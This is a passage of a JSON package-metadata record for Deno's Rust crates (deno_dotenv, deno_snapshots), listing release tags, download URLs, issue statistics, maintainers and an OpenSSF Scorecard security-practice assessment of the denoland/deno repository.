1T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T01:46:28.004Z","dependent_packages_count":0,"downloads":36575,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":93.5848213721284,"dependent_repos_count":17.319930880431574,"dependent_packages_count":22.89374973658701,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":44.59950066304899},"purl":"pkg:cargo/deno_dotenv","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_dotenv","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_dotenv","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_dotenv/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-02-20T15:47:44.062Z","updated_at":"2026-02-20T15:47:44.062Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-02-20T15:47:44.124Z","updated_at":"2026-02-20T15:47:44.124Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4490393,"name":"deno_snapshots","ecosystem":"cargo","description":"v8 snapshot used by the Deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":72,"first_release_published_at":"2022-06-30T20:30:24.596Z","latest_release_published_at":"2026-08-06T11:48:20.826Z","latest_release_number":"0.72.0","last_synced_at":"2026-08-29T21:57:51.868Z","created_at":"2022-06-30T20:31:07.531Z","updated_at":"2026-08-29T21:57:51.868Z","registry_url":"https://crates.io/crates/deno_snapshots/","install_command":"cargo install deno_snapshots","documentation_url":"https://docs.rs/deno_snapshots/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using 